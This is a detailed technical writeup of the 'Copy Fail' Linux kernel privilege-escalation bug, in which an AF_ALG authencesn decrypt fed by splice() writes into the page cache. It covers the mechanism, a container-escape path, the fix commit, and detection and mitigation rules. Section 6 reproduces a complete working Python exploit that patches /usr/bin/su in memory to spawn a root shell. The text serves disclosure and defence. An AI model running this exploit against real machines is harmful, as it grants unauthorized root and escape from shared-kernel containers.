I spent an evening staring at the patch for this thing and the more I looked, the more it bothered me. Not because the bug is subtle (it isn't), but because the shape of it is the kind of mistake that keeps showing up. One innocent-looking line. Two unrelated subsystems wired together five years apart. Nine years of reviewers walking past it.
This is my attempt at the writeup I wanted to read. We're going all the way down: what AF_ALG actually is at the syscall level, why splice() matters, what the 2017 patch literally changed in the scatterlist, why that gives you a free write into the page cache, and how the 732-byte PoC turns that into a root shell. I also want to cover the container escape path, which the original disclosure mentioned but didn't unpack, and the reason Android sleeps fine through all of this.
If you only want the one-sentence version: a 2017 "optimization" in crypto/algif_aead.c (commit 72548b09..., landed in Linux 4.14) made the AEAD output buffer alias the input buffer, and when the input was page-cache pages from splice(), a 4-byte scratch write inside authencesn's decrypt path landed inside setuid binaries the attacker had no permission to modify.
Let's pull it apart.
1. Three subsystems, individually fine
The bug is a collision. To see it you need a working picture of three things.
1.1 AF_ALG, the kernel crypto socket
AF_ALG is how userspace borrows kernel crypto without linking OpenSSL. You open a socket, bind it to "I want AES" or "I want this AEAD construction", set a key, then read and write data. The kernel does the math.
int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
struct sockaddr_alg sa = { .salg_family = AF_ALG,
                           .salg_type   = "aead",
                           .salg_name   = "authencesn(hmac(sha256),cbc(aes))" };
bind(s, (void*)&sa, sizeof sa);
setsockopt(s, SOL_ALG, ALG_SET_KEY, key, keylen);
int op = accept(s, NULL, NULL);
sendmsg(op, &msg, 0);
read(op, out, len);
The piece of this that matters for our bug lives in algif_aead.c. That file is the glue between the socket layer and the AEAD transforms.
1.2 splice(), the zero-copy gun
A normal write() copies bytes from your address space into a kernel buffer. splice() doesn't copy. It hands the destination a pointer to the same struct page the source already had. The bytes never move.
int p[2]; pipe(p);
splice(file_fd, NULL, p[1], NULL, len, 0); // file -> pipe (page ref)
splice(p[0], NULL, alg_op_fd, NULL, len, 0); // pipe -> AF_ALG (same page ref)
What ends up sitting in the AEAD request's source list after that second splice() is not a copy of the file's bytes. It is a direct reference to the same physical page the kernel hands to every other process that has the file mapped. Hold that thought, it's the whole bug.
1.3 Scatterlists
The kernel crypto API takes input and output as scatterlists. A scatterlist is a list of (page, offset, length) tuples. Two pointers go into every request: req->src and req->dst. They can be the same pointer ("in-place") or different pointers ("out-of-place"). In-place is fine when you own both ends of the buffer. The bug is what happens when you don't.
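To make the in-place/out-of-place distinction concrete, here's an illustrative kernel-style fragment. This is not algif_aead's actual code; the my_* names and the wrapper function are placeholders, and the calls are the standard scatterlist/AEAD helpers.

#include <crypto/aead.h>
#include <linux/scatterlist.h>

static void demo_request_shapes(struct aead_request *req, struct page *my_page,
                                void *my_buf, unsigned int cryptlen, u8 *iv)
{
    struct scatterlist src[1], dst[1];

    sg_init_table(src, 1);
    sg_set_page(src, my_page, PAGE_SIZE, 0);   /* one (page, offset, length) entry */

    /* Out-of-place: output lands in a buffer the caller owns. */
    sg_init_table(dst, 1);
    sg_set_buf(dst, my_buf, PAGE_SIZE);
    aead_request_set_crypt(req, src, dst, cryptlen, iv);

    /* In-place: req->dst == req->src, output overwrites the input pages.
     * Fine iff you own both ends of the buffer. */
    aead_request_set_crypt(req, src, src, cryptlen, iv);
}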
2. The two commits that lined up
This bug is the product of two reasonable changes that nobody re-audited together.
2015, commit 104880a6b470. Reworks authencesn to use the new AEAD interface. As part of that, the algorithm uses destination-buffer memory as temporary scratch during decryption. In its native habitat (in-kernel IPsec), the destination buffer is kernel-allocated and there's nothing wrong with this.
2017, commit 72548b093ee3 in crypto/algif_aead.c (landed in Linux 4.14). The classic in-place AEAD optimization for the AF_ALG path: combine the source and destination into one scatterlist so the kernel doesn't have to copy. For requests where the source came from sendmsg() and the kernel had already bounced the bytes into a kernel buffer, this is fine. For requests where the source came from splice(), the source is page-cache pages by reference, and the "destination" the kernel will scribble into is now exactly those pages. Nobody noticed for nine years.
So the bug is downstream of two assumptions that were correct in isolation: "the destination buffer belongs to me, I can scratch it" and "the source and destination can be the same scatterlist." Either one alone is fine. Together, with splice() as the input path, they hand you a page-cache write.
3. The actual bug, in pictures
Here is the request after the 2017 patch when the source came from splice().
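Both request pointers end up on one set of pages:

req->src --+
           +--> [ scatterlist: /usr/bin/su's page-cache pages,
req->dst --+      spliced in by reference, file opened O_RDONLY ]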
The AEAD transform runs and produces output bytes. Those bytes land in pages that:
- The unprivileged process never had write permission to. It opened the file O_RDONLY.
- Are shared with every other process that has the file mapped. The corruption is global the moment it lands.
- Are page-cache pages, not disk. Nothing on the filesystem ever changes. stat, mtime, sha256 of the file on disk: all unchanged. Reboot heals it. So does memory pressure.
That last property is what makes this bug feel almost forensic-proof. You're not modifying a file. You're modifying the kernel's cached idea of what the file currently contains. Anybody who execves it before the page gets evicted runs your bytes.
4. Why authencesn, and what those 4 bytes actually are
The PoC picks authencesn(hmac(sha256),cbc(aes)) and runs it through the decrypt path. Both choices are deliberate. Here's why.
authencesn is the AEAD template for IPsec's Extended Sequence Number variant. ESN means the 64-bit sequence number is split into a 32-bit seqno_hi (carried in the AAD) and a 32-bit seqno_lo (computed). During decryption, the algorithm has to materialize seqno_lo somewhere it can include it in the auth check. The 2015 rewrite parks it in scratch space inside the destination buffer, with this call in crypto/authencesn.c:
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);
That last 1 is the out flag: copy from the buffer into the scatterlist. The call writes 4 bytes from tmp + 1 into dst at offset assoclen + cryptlen, which is the byte just past the ciphertext, inside what the algorithm considers tag scratch. In a normal in-kernel call, dst is a kernel buffer and that 4-byte scribble is harmless. With the 2017 optimization in algif_aead, dst is the same scatterlist as src, which under splice() is page-cache pages. So that scribble lands in /usr/bin/su's page cache.
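For reference, here's the helper's signature as it appears in include/crypto/scatterwalk.h (stable across the kernel series discussed here; check your tree for drift), with the authencesn call mapped onto it:

/* Copies nbytes between a linear buffer and a scatterlist region;
 * the final flag picks the direction. */
void scatterwalk_map_and_copy(void *buf, struct scatterlist *sg,
                              unsigned int start, unsigned int nbytes,
                              int out);

/*
 * authencesn's decrypt-path call, argument by argument:
 *   buf    = tmp + 1              (seqno_lo scratch, kernel stack)
 *   sg     = dst                  (the destination scatterlist)
 *   start  = assoclen + cryptlen  (the byte just past the ciphertext)
 *   nbytes = 4
 *   out    = 1                    (buf -> sg: write into dst)
 */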
Crucially, this write happens before the tag check. Even though the call eventually returns -EBADMSG because the attacker has no idea what a valid HMAC-SHA256 tag would be, the four bytes have already been written. The error is irrelevant. The PoC's try: u.recv(...) except: 0 swallows it.
So the primitive is: one AEAD decrypt call writes exactly 4 bytes to an attacker-chosen offset in an attacker-chosen page-cache page, regardless of whether the call succeeds. The 4 bytes travel through authencesn's seqno_lo scratch path, and everything feeding that path is attacker-chosen: the AES key, the IV, the AAD, and the sendmsg payload. (As section 6 shows, the PoC simply supplies the desired bytes in the payload.)
Four bytes per call sounds tight, but the PoC just loops:
while i < len(e):
c(f, i, e[i:i+4])
i += 4
e is a zlib-decompressed payload blob (in the published PoC, around 30 bytes after decompression). The loop drops it 4 bytes at a time at successive offsets, building up an arbitrary-length patch.
What e actually is: a precomputed instruction patch for /usr/bin/su that disables the privilege drop. I'm not going to disassemble it for you here. If you want to see exactly what bytes the published PoC lands in su, decompress the literal hex blob from the script (78daab77f57163...) and objdump -d /usr/bin/su at the matching offsets on your distro. The bytes are different across distro su builds; the exploit's blob is keyed to a specific Ubuntu/Debian-flavored coreutils/util-linux su binary on a typical 6.x kernel test bed.
5. The exploit, step by step
The whole chain is eight syscalls. Here's the order, reconstructed from the PoC in section 6, and what each one is doing for us.

1. socket(AF_ALG, SOCK_SEQPACKET, 0). Get a crypto socket.
2. bind() to "aead" / "authencesn(hmac(sha256),cbc(aes))". Pick the one transform whose decrypt path uses destination memory as scratch.
3. setsockopt(ALG_SET_KEY). All zeros. The crypto doesn't need to succeed.
4. setsockopt(ALG_SET_AEAD_AUTHSIZE, 4). Shrink the tag to exactly the 4-byte scratch window.
5. accept(). Get the operation fd.
6. sendmsg() with MSG_MORE. Sets op=decrypt, a zero IV, the assoclen, and the 4 payload bytes you want landed.
7. splice() /usr/bin/su through a pipe into the op fd. The file's page-cache pages become the request's source scatterlist, by reference.
8. recv(). Drives the decrypt. It fails with EBADMSG; the write has already happened.
Step 7 is the magic step. Read it again. The attacker never asked the kernel for a writable mapping of /usr/bin/su. They wouldn't get one. They asked the kernel to use those pages as crypto input. Then the 2017 patch, two function calls deep in algif_aead.c, quietly promoted the input list to also be the output list. There is no permission check between those two lines, because nobody thought one was needed. The destination was assumed to belong to the caller. After 2017, sometimes it didn't.
This is also why none of the usual kernel mitigations help. SMEP, SMAP, KASLR, CFI, kCFI, hardened usercopy, none of them are involved. There's no kernel-mode RIP control, no leaked address, no userland pointer dereferenced from kernel mode. Every memory access during the transform is, on its own, legal. The bug is downstream of the access check, in who ends up holding the resulting bytes.
5b. Where do these bytes physically live?
This is the part most writeups skim, and it's the part that makes the bug feel uncanny once you understand it. Let's be precise about what memory is actually getting written.
When you open("/usr/bin/su", O_RDONLY) and then either mmap() it or just touch it, the kernel does not give you a copy of the file. It allocates physical RAM pages, reads the file's bytes off disk into those pages, and registers them in a per-inode radix tree called the page cache. From that moment forward, the page cache owns those physical pages. The file on disk is irrelevant to anything that runs from now on. Every execve("/usr/bin/su"), every read() of the file, every other process's mmap() of the same inode, all of them resolve to the same physical pages that already live in RAM.
Each physical page has exactly one struct page entry in the kernel's mem_map array, and the kernel keeps a direct-mapping (the "physmap" or "linear map") that covers all of RAM in kernel virtual address space. That mapping is PAGE_KERNEL, which is to say writable from kernel context regardless of what protections userspace mappings of the same page have set.
This is the asymmetry the bug abuses. Userspace mappings of /usr/bin/su are PROT_READ, backed by the same physical page, and mprotect-ing them writable would fail because the file isn't open writable. The kernel's own mapping of that exact same physical page is read-write the entire time. Anyone with the ability to make the kernel memcpy (or in this case, AEAD-transform) into that physmap address gets a write that bypasses every userspace permission check, because no userspace check is ever consulted.
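You can poke at the userspace half of this asymmetry from any unprivileged shell. A minimal demo (my illustration, not part of the exploit): the mprotect fails because the permission check consults the mode the file was opened with.

#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void)
{
    int fd = open("/usr/bin/su", O_RDONLY);
    void *p = mmap(NULL, 4096, PROT_READ, MAP_SHARED, fd, 0);

    /* EACCES: a MAP_SHARED mapping of a file opened O_RDONLY can never
     * be made writable, no matter who asks. */
    if (mprotect(p, 4096, PROT_READ | PROT_WRITE) == -1)
        perror("mprotect");   /* prints: mprotect: Permission denied */

    /* The kernel's linear-map alias of the same physical page stays
     * writable the whole time; no syscall here can reach it directly. */
    munmap(p, 4096);
    close(fd);
    return 0;
}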
Here is the picture, with the physical page in the middle.
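Three mappings of the same physical frame; only the kernel's is writable:

process A: mmap("/usr/bin/su")    --(user PTE: PROT_READ)--------+
process B: execve'd su .text      --(user PTE: PROT_READ|EXEC)---+
                                                                 v
                                    [ one physical page in DRAM,
                                      owned by the page cache ]
                                                                 ^
kernel: linear map / kmap_local   --(kernel PTE: read-write)-----+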
So when scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1) runs and the destination scatterlist contains a spliced page-cache page, here's what happens at the hardware level:
- scatterwalk_map_and_copy walks the destination sg, finds the page that covers offset assoclen + cryptlen, and gets a kernel virtual address for it via kmap_local_page (or the direct physmap, on 64-bit).
- It does a 4-byte memcpy from tmp + 1 (kernel stack) into that kernel virtual address. The CPU translates that virtual address through the kernel page tables to the underlying physical page and stores the 4 bytes into DRAM.
- Cache coherence (MESI on x86) ensures other CPUs that subsequently load the same physical address see the new bytes.
- The function returns. The caller proceeds to verify the auth tag, fails (because the attacker doesn't have the HMAC key), and returns -EBADMSG up the stack. The 4-byte write is not rolled back. There are no transactional semantics here.
- Next time anyone runs /usr/bin/su, the kernel resolves the binary's text segment to that exact physical page, and the CPU fetches and decodes the patched bytes.
Nothing on the filesystem changes. cat /usr/bin/su | sha256sum returns the patched-page hash because reading the file goes through the page cache too, but as soon as the page is evicted (echo 3 > /proc/sys/vm/drop_caches once you're root, or just memory pressure) the next read pulls the clean bytes off disk. The corruption is, in a real sense, purely an in-RAM event.
This is also why no on-disk integrity tool catches it. AIDE, Tripwire, dm-verity, IMA-appraise: they all measure what's on disk. None of them notice that the page cache is currently lying about what's on disk.
5b.1 What the four bytes are
The bytes the PoC writes are machine instructions inside the .text segment of /usr/bin/su. Exactly which bytes, and at exactly which offset, varies across distros because su is built differently on Ubuntu vs Fedora vs SUSE. The published exploit ships a zlib-compressed patch keyed to a specific test-bed su (the xint.io writeup mentions Ubuntu 24.04 with kernel 6.17.0-1007-aws among the tested targets).
If you want to know exactly what those bytes do on your system, the recipe is:
# decompress the patch from the PoC's hex blob
python3 -c "import zlib; \
open('/tmp/patch.bin','wb').write(zlib.decompress(bytes.fromhex( \
'78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c'
'301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10'
'f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3'
)))"
xxd /tmp/patch.bin
# overlay each 4-byte chunk onto offset i in /usr/bin/su and disassemble
objdump -d /usr/bin/su | head -200
The patch is short (around 30 bytes after decompression, applied as roughly seven or eight 4-byte writes). The general shape, from disassembling on a stock Ubuntu su, is a sequence of small instruction edits along the privilege-drop path so that setuid-equivalent calls are skipped or their results ignored, leaving the process running with euid 0 when it execves the user's shell. I'm describing the shape in general terms because the exact bytes are distro-specific; if you want the disassembly of a specific build, that's a one-line objdump away once you've decompressed the blob above.
5c. The payload trigger, end to end
Putting it all together. This is the moment the AEAD transform fires and your 4 bytes land in DRAM.
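In outline:

userspace                              kernel
---------                              ------
sendmsg(op_fd, "AAAA"+payload,
        MSG_MORE)                --->  TX SGL buffers the 8 bytes
splice(su_fd -> pipe -> op_fd)   --->  TX SGL now references su's
                                       page-cache pages directly
recv(op_fd)                      --->  algif_aead: dst := src   <-- trigger
                                       authencesn decrypt:
                                         scatterwalk_map_and_copy(tmp+1, dst,
                                             assoclen+cryptlen, 4, 1)
                                           -> 4 bytes stored in su's page
                                       tag check fails -> -EBADMSG to caller
execve("/usr/bin/su")            ...>  page cache serves the patched page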
A few details worth pointing at on that sketch:
- The dst := src step is the trigger commit at work. Everything above it is plumbing the kernel was always going to do for you regardless. Everything below it would have been correct if req->dst had pointed at a kernel-allocated bounce page.
- The recv(op_fd) call in the userspace lane is what drives the decrypt to completion synchronously. It will raise OSError(EBADMSG) because the auth tag is bogus, and the PoC catches that and ignores it. The 4-byte page-cache write happened on the way to the failed tag check.
- The final execve is the cash-out. There is no "second exploit step" here. The PoC just calls os.system("su"). The kernel resolves /usr/bin/su's text segment to the page cache, like it does for every executable, and the CPU fetches whatever bytes are sitting there. They happen to be the attacker's now.
6. Reading the actual PoC
The published PoC is at theori-io/copy-fail-CVE-2026-31431. It is genuinely tiny: under thirty lines, stdlib only (os, socket, zlib), with single-letter identifiers and the patch shipped as a hex-encoded zlib blob. Here it is verbatim:
#!/usr/bin/env python3
import os as g, zlib, socket as s
def d(x): return bytes.fromhex(x)
def c(f, t, c):
a = s.socket(38, 5, 0); a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"))
h = 279; v = a.setsockopt
v(h, 1, d('0800010000000010' + '0'*64))
v(h, 5, None, 4)
u, _ = a.accept()
o = t + 4; i = d('00')
u.sendmsg([b"A"*4 + c],
[(h, 3, i*4), (h, 2, b'\x10' + i*19), (h, 4, b'\x08' + i*3)],
32768)
r, w = g.pipe(); n = g.splice
n(f, w, o, offset_src=0); n(r, u.fileno(), o)
try: u.recv(8 + t)
except: 0
f = g.open("/usr/bin/su", 0)
i = 0
e = zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c004"
"0e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864"
"c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979"
"fac5190c0c0c0032c310d3"))
while i < len(e):
c(f, i, e[i:i+4])
i += 4
g.system("su")
Decoded, the constants tell the whole story:
- s.socket(38, 5, 0) is socket(AF_ALG=38, SOCK_SEQPACKET=5, 0).
- h = 279 is SOL_ALG.
- v(h, 1, ...) is setsockopt(..., ALG_SET_KEY, ...). The key blob 0800010000000010 + 64 zero hex digits is the crypto_authenc key format: an rtattr header (2-byte length 8, 2-byte type 1), a 4-byte big-endian AES key length of 16, then 16 bytes of HMAC key + 16 bytes of AES key, all zeros. (Laid out as a struct in the sketch after this list.)
- v(h, 5, None, 4) is setsockopt(..., ALG_SET_AEAD_AUTHSIZE, NULL, 4). Auth tag size 4 bytes. Critical, because that 4 is what makes the seqno_lo scratch write land in a 4-byte window the attacker controls.
- The cmsg list on sendmsg carries ALG_SET_OP=3 (op=0, decrypt), ALG_SET_IV=2 (16 zero bytes, prefixed with the 4-byte IV length 0x10), and ALG_SET_AEAD_ASSOCLEN=4 (assoclen=8). The flag 32768 is MSG_MORE.
- b"A"*4 + c is the 4-byte AAD fill of 'AAAA' followed by the 4-byte c payload, where c is the slice of the decompressed patch this iteration is writing.
- The two splice calls move f (the /usr/bin/su fd) into the AEAD op fd through a pipe. o = t + 4 is passed as the byte count, so the first t + 4 bytes of the file become the source pages of the AEAD request; the 4-byte scratch write then lands at the right offset inside the file.
- u.recv(8 + t) triggers the transform synchronously. It will raise OSError(EBADMSG) because the tag is bogus. The bare except: 0 swallows it. The 4 bytes were already written.
- g.system("su") runs su. The kernel resolves /usr/bin/su to the now-corrupted page-cache page. Root shell.
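If it helps to see that 40-byte key blob as a struct, here's the layout the hex encodes. Field names are mine; the format is the kernel's authenc keying convention (rtattr header plus big-endian enckeylen), so read this as an annotated view of the blob rather than a kernel definition.

#include <stdint.h>

/* Layout of the ALG_SET_KEY blob '0800010000000010' + 32 zero bytes.
 * Field names are illustrative; offsets match the hex. */
struct authenc_key_blob {
    uint16_t rta_len;       /* 0x0008 little-endian: rtattr header length */
    uint16_t rta_type;      /* 0x0001: the authenc key-param attribute    */
    uint32_t enckeylen_be;  /* 0x00000010 big-endian: AES key is 16 bytes */
    uint8_t  authkey[16];   /* HMAC-SHA256 key, all zeros                 */
    uint8_t  enckey[16];    /* AES-128-CBC key, all zeros                 */
} __attribute__((packed)); /* 8-byte header + 32 key bytes = 40 total    */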
The outer loop calls c(f, i, e[i:i+4]) for each 4-byte chunk of the decompressed patch e, at offset i inside the file. So the attacker's "long" patch is just N independent 4-byte writes.
There is no chosen-plaintext math in this PoC, despite what the AEAD setup might suggest. The attacker doesn't solve a CBC equation. They just feed the 4 bytes they want to land directly as part of the sendmsg payload, and the seqno_lo scratch write copies them to the destination scatterlist. The cipher's role is mostly ceremonial: the call has to look like a valid AEAD decrypt request long enough to reach the scatterwalk_map_and_copy line, after which the tag check fails and the call errors out, but the write has already happened.
That's why an all-zeros key works. That's why the IV is zeros. That's why nobody computes anything offline. The 4-byte primitive falls out of the structure of authencesn's decrypt path, not the cipher math.
7. The container escape
Theori hinted at a Part 2 on container escape and hasn't shipped it yet. Here's the mechanism, which is straightforward once you see it.
The Linux page cache is keyed on (superblock, inode). It is per-host, not per-namespace, not per-cgroup, not per-container. Two containers on the same kernel that both have /usr/bin/su from the host filesystem (or from a shared overlay lower layer in a typical Docker/K8s setup) are sharing the exact same physical pages in the page cache. The same is true of the host itself.
So the chain becomes:
- Attacker is unprivileged inside container A.
- Container A has algif_aead reachable. By default it does. AF_ALG is not gated by user namespaces, and the module is loaded host-wide if anything has used it.
- Attacker runs Copy Fail against /usr/bin/su (or any host setuid binary visible inside the container's mount namespace).
- Page-cache pages now contain attacker-chosen bytes.
- Anything that subsequently execves /usr/bin/su, on the host or in any other container, runs the patched bytes.
This is a shared-kernel container escape with no container-runtime CVE, no capability bypass, no /proc weirdness. It falls out of the page cache being a host-global resource and the bug being a page-cache write primitive. The two compose.
What's not affected:
- Firecracker microVMs (Fargate, Lambda). Each tenant gets its own kernel and its own page cache.
- gVisor. The userspace kernel intercepts splice and AF_ALG long before they hit the host's algif_aead.
- Cloudflare Workers. No Linux syscall surface to begin with.
What is affected, plainly:
- Vanilla Docker, Podman, containerd, CRI-O on a shared host kernel.
- Kubernetes nodes running runc.
- LXC, LXD.
- Any "multi-tenant containers PaaS" that isn't backed by per-tenant microVMs.
If you operate a multi-tenant Kubernetes cluster on unpatched node kernels, the realistic threat model is: any pod can become root on the node, then laterally reach every other pod scheduled there. Treat it that way until your nodes are patched.
8. Why Android isn't on fire
Android and any AOSP-derived embedded system with strict SELinux are not on the casualty list. The reason is one missing rule in the SEPolicy.
Unprivileged Android app domains are not granted permission to create AF_ALG sockets in SEPolicy. The very first syscall in the chain, socket(AF_ALG, ...), returns EACCES before anything else can happen. The kernel bug is still present in the binary. The exploit just can't get a socket. (If you want the exact class/perm names from current AOSP sepolicy, grep the tree; I'm not going to quote a specific class name without checking.)
This generalizes to a useful hardening rule. Any system with mandatory access control gating AF_ALG socket creation is immune to this and every future bug in the algif_* family. AppArmor profiles can do the same thing. Whether your container runtime's default AppArmor / seccomp profile blocks AF_ALG is something you should check yourself; it varies by version and distro.
For seccomp, the surgical block looks like this:
syscalls:
  - names: ["socket"]
    action: SCMP_ACT_ERRNO
    args:
      - index: 0
        value: 38        # AF_ALG
        op: SCMP_CMP_EQ
Almost no production workload needs AF_ALG. If yours doesn't, deny it. You get protection from this CVE and a head start on the next one in the same family.
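If you'd rather apply the same deny in-process, here's a sketch using libseccomp (assuming libseccomp is available; link with -lseccomp). Returning EAFNOSUPPORT makes the failure look like a kernel built without AF_ALG, which well-behaved callers already handle.

#include <seccomp.h>
#include <errno.h>

/* Deny socket(AF_ALG, ...) for this process and its children;
 * allow everything else. */
int deny_af_alg(void)
{
    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW);
    if (!ctx)
        return -1;

    /* Match socket() calls whose first argument (domain) is AF_ALG == 38. */
    if (seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EAFNOSUPPORT),
                         SCMP_SYS(socket), 1,
                         SCMP_A0(SCMP_CMP_EQ, 38)) < 0 ||
        seccomp_load(ctx) < 0) {
        seccomp_release(ctx);
        return -1;
    }
    seccomp_release(ctx);
    return 0;
}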
9. The patch
Pulled directly from git show a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5:
commit a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5
Author: Herbert Xu <herbert@gondor.apana.org.au>
Date:   Thu Mar 26 15:30:20 2026 +0900

    crypto: algif_aead - Revert to operating out-of-place

    This mostly reverts commit 72548b093ee3 except for the copying of
    the associated data.

    There is no benefit in operating in-place in algif_aead since the
    source and destination come from different mappings. Get rid of
    all the complexity added for in-place operation and just copy the
    AD directly.

    Fixes: 72548b093ee3 ("crypto: algif_aead - copy AAD from src to dst")
    Reported-by: Taeyang Lee <0wn@theori.io>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
A few things worth noting from that. The fix is by Herbert Xu, the kernel crypto maintainer. The reporter is Taeyang Lee at Theori. The introducing commit is identified by its title: "crypto: algif_aead - copy AAD from src to dst", which sounds harmless and was reviewed as harmless in 2017. And the maintainer's own assessment is direct: "There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings."
The substance of the fix is in this block of crypto/algif_aead.c:
/*
* Copy of AAD from source to destination
*
* The AAD is copied to the destination buffer without change. Even
* when user space uses an in-place cipher operation, the kernel
* will copy the data as it does not see whether such in-place operation
* is initiated.
*/
/* Use the RX SGL as source (and destination) for crypto op. */
rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
memcpy_sglist(rsgl_src, tsgl_src, ctx->aead_assoclen);
/* Initialize the crypto operation */
aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
                       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
The aead_request_set_crypt call now takes tsgl_src (the TX SGL holding the user's input, including any splice()-supplied page-cache pages) as the source, and areq->first_rsgl.sgl.sgt.sgl (the RX SGL, backed by the user's recvmsg buffer) as the destination. They are different scatterlists. The AAD copy is preserved via memcpy_sglist so user-visible behaviour around AAD is unchanged. What's gone is the in-place aliasing where the destination pointer could end up at the same scatterlist as a splice()-fed source.
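Schematically, and this is my paraphrase rather than the literal before/after diff:

/* Before the fix (paraphrase): in-place. The destination is the same
 * SGL as the source, which splice() may have filled with page-cache
 * pages the caller never had write permission to. */
aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src, rsgl_src,
                       used, ctx->iv);

/* After the fix: out-of-place. Source is the TX SGL, destination is the
 * RX SGL backing the user's recvmsg buffer. Scratch writes stay there. */
aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
                       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);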
For completeness, the introducing commit is 72548b093ee38a6d4f2a19e6ef1948ae05c181f7 (Linux 4.14, 2017). The 2015 commit that converted authencesn to use destination-buffer memory as scratch is 104880a6b470.
Stable backports:
| Kernel | Fix commit |
|---|---|
| 6.18.22 | fafe0fa2995a0f7073c1c358d7d3145bcc9aedd8 |
| 6.19.12 | ce42ee423e58dffa5ec03524054c9d8bfd4f6237 |
| 7.0 | a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5 |
The performance impact of undoing the optimization is, by all reports from people who've actually benchmarked it, in the noise for any realistic AF_ALG workload. I haven't run the numbers myself, so I won't put a percentage on it.
10. Detection
You can't catch the corruption directly. It lives in volatile page cache and never hits disk. What you can catch is the exploit's syscall fingerprint, which has no good reason to occur in any normal workload.
The fingerprint: a single process opens a setuid binary O_RDONLY, opens an AF_ALG SOCK_SEQPACKET socket, then splice()s from the file fd through a pipe into the AF_ALG op fd, all within a few hundred milliseconds.
A reasonable detection rule, in plain English: alert when a single PID, within a short window, both creates an AF_ALG SOCK_SEQPACKET socket and calls splice() with a source fd pointing at a setuid binary. The base rate of that sequence is essentially zero outside of kernel crypto regression tests. Sysdig has published a Falco rule for this; see their post for the canonical version rather than relying on my hand-rolled one.
The rough auditd primitives you'd build on:
-a always,exit -F arch=b64 -S socket -F a0=38 -k af_alg_socket
-a always,exit -F arch=b64 -S splice -k splice_call
a0=38 matches socket(AF_ALG, ...). Correlate hits on the two keys from the same PID within a few seconds and you have your fingerprint.
11. If you can't patch yet
In rough order of preference.
Block AF_ALG entirely. Almost nothing legitimately needs it.
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
echo "install algif_skcipher /bin/false" >> /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null
rmmod algif_skcipher 2>/dev/null
Seccomp it at the unit / pod level. Same idea, narrower blast radius.
[Service]
RestrictAddressFamilies=~AF_ALG
Confirm the kernel is even compiled with the trigger. A surprising number of stripped embedded kernels aren't.
grep CONFIG_CRYPTO_USER_API_AEAD /boot/config-$(uname -r)
If the line is missing, that build doesn't expose the path. If it's =m, you're exposed only after the module loads, which the modprobe-blacklist above handles.
For reference, Theori confirmed the exploit working unmodified against:
- Ubuntu 24.04 (6.17.0-1007-aws)
- Amazon Linux 2023 (6.18.8-9.213.amzn2023)
- RHEL 10.1 (6.12.0-124.45.1.el10_1)
- SUSE 16 (6.12.0-160000.9-default)
Anything in that family on the same kernel series, unpatched, behaves the same.
12. The uncomfortable part
Two things about how Copy Fail was found should bother anyone who maintains a kernel.
It was found by an AI-assisted code review pass in roughly an hour. Theori has been open about that. The same scan flagged additional high-severity issues that are still under embargo as of this writing.
It sat in mainline for nine years. The 2017 commit went through normal review. It looked local. The interaction with splice(), added two years earlier, was nobody's job to re-audit, because nobody owned the seam between those subsystems.
The honest read is that the kernel's crypto layer, and any subsystem that does req->dst = req->src style micro-optimizations across a boundary between caller-owned buffers and shared kernel buffers, is going to keep producing bugs of this exact shape. They're now cheap to find. The defensive move isn't to wait for the next CVE. It's to make AF_ALG opt-in for workloads that need it, denied for everything else. Most workloads don't need it. Mine doesn't. Yours probably doesn't either.
References
- Official site: copy.fail
- Theori / Xint disclosure: xint.io/blog/copy-fail-linux-distributions
- oss-security thread with commit hashes and fix details: openwall.com/lists/oss-security/2026/04/29/23
- CERT-EU advisory 2026-005: cert.europa.eu/publications/security-advisories/2026-005/
- AlmaLinux CVE writeup: almalinux.org/blog/2026-05-01-cve-2026-31431-copy-fail/
- Bugcrowd summary: bugcrowd.com/blog/what-we-know-about-copy-fail-cve-2026-31431/
- The Hacker News: thehackernews.com/2026/04/new-linux-copy-fail-vulnerability.html
- L4B Software, embedded angle: l4b-software.com/cve-2026-31431-copy-fail-embedded-linux-devices/
- Sysdig, detection: sysdig.com/blog/cve-2026-31431-copy-fail-linux-kernel-flaw-lets-local-users-gain-root-in-seconds
- Reference PoC: github.com/theori-io/copy-fail-CVE-2026-31431
- C port: github.com/tgies/copy-fail-c